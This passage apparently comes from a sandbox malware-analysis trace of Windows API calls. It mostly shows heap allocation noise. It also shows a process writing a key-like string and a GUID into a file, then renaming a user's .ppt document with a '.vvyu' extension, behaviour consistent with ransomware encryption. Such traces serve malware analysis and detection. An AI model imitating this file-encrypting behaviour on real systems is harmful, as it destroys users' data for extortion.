hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a108 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42538 | out: hHeap=0x6a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.806] WriteFile (in: hFile=0x574, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x4dfa, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x4dfa, lpOverlapped=0x0) returned 1 [0194.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.807] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x4dff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.807] WriteFile (in: hFile=0x574, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.808] WriteFile (in: hFile=0x574, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.809] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.809] WriteFile (in: hFile=0x574, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.809] CloseHandle (hObject=0x574) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0194.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d2cc80 [0194.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0194.810] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\XiVbHKfo h.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\xivbhkfo h.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\XiVbHKfo h.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\xivbhkfo h.ppt.vvyu")) returned 1 [0194.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.812] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.815] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40871210, ftCreationTime.dwHighDateTime=0x1d89da8, ftLastAccessTime.dwLowDateTime=0xf37ea420, ftLastAccessTime.dwHighDateTime=0x1d89dc9, ftLastWriteTime.dwLowDateTime=0xf37ea420, ftLastWriteTime.dwHighDateTime=0x1d89dc9, nFileSizeHigh=0x0, nFileSizeLow=0x4dff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XiVbHKfo h.ppt", cAlternateFileName="XIVBHK~1.PPT")) returned 0 [0194.815] FindClose (in: hFindFile=0x2cbfa50 | out: hFindFile=0x2cbfa50) returned 1 [0194.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0194.816] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.829] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.859] RtlAllocateHeap 